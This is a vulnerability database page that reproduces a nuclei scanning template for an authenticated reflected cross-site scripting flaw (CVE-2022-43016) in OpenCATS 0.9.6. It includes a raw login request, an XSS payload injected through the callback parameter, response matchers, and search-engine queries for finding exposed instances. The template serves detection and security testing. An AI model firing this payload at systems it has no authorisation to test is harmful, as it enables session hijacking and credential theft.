Lucene search
K

OpenCATS 0.9.6 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

OpenCATS 0.9.6 - Cross-Site Scripting vulnerability via callback component allows injection of arbitrary script in browse

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the callback component of the OpenCATS workforce management system allows attackers to perform cross-site scripting attacks.
15 Dec 202300:00
bdu_fstec
Circl
CVE-2022-43016
19 Oct 202222:15
circl
CNNVD
OpenCats 跨站脚本漏洞
19 Oct 202200:00
cnnvd
CNVD
OpenCATS Cross-Site Scripting Vulnerability (CNVD-2022-70589)
20 Oct 202200:00
cnvd
CVE
CVE-2022-43016
19 Oct 202200:00
cve
Cvelist
CVE-2022-43016
19 Oct 202200:00
cvelist
EUVD
EUVD-2022-46065
3 Oct 202520:07
euvd
NVD
CVE-2022-43016
19 Oct 202218:15
nvd
OSV
CVE-2022-43016
19 Oct 202218:15
osv
Prion
Cross site scripting
19 Oct 202218:15
prion
Rows per page
id: CVE-2022-43016

info:
  name: OpenCATS 0.9.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43016
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-43016
    cwe-id: CWE-79
    epss-score: 0.01333
    epss-percentile: 0.67698
    cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"OpenCATS"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve2022,cve,xss,opencats,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'EVAL=<script>alert(document.domain)</script>'
          - 'cats_connected'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100af21e2d13ded1ed663721577ab385a2a9805398646728dfc67565828f27dfaec022056709e89a97c8f5f02328f25ea8d6e75fd8a91b7f4ba328f4d0abdbe3ed04ea1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01333
SSVC
33